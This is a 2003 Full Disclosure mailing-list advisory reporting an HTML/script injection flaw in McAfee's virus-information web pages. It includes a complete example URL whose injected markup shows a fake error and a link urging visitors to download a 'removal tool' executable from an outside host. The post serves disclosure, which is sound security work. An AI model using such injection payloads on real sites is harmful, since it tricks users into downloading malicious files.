Full Disclosure mailing list archives

Code executing in McAfee's virus information websites

From: Redaktion-Kryptocrew <momolly () kryptocrew de>
Date: Wed, 3 Sep 2003 08:09:09 +0200



Vulnerability:     Code executing in McAfee's virus information websites
Found:             29 Aug 2003
Vendor:            McAfee Security
Vendor notified:   02 Sept 2003
Vendor response:   no
Public release:    03 Sept 2003



We were surfing McAfee's virus information sites and possibilities to inject even
harmful
scripts. We're testing successfully executed remote code using the ADODB
exploit.
McAfee overlooked this fault in their virus Information websites (all
languages!).



[Example]:
http://de.mcafee.com/virusInfo/default.asp?id=helpCenter&hcName=Sobig<br><br><b>if%20you%20recieve%20a%20error%20above%20you%20must</b><br><h3><a%20href=http://www.kryptocrew.de/badfile.exe>download%20this%20removal%20tool!%20NOW!!!</a><br>testing%20your%20saftey...%20%20test



Thanks to:
Donnie Werner (exploitlabs.com), Roland Brecht (kryptocrew.de) & Alexander Mueller
(ec-security.com)


Regards
G.P

--
======================================================================

G.P
Online-Redaktion
                  
===============================

Kryptocrew
.: your security advisor team :.           mailto:momolly () kryptocrew de

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

Code executing in McAfee's virus information websites Redaktion-Kryptocrew (Sep 03)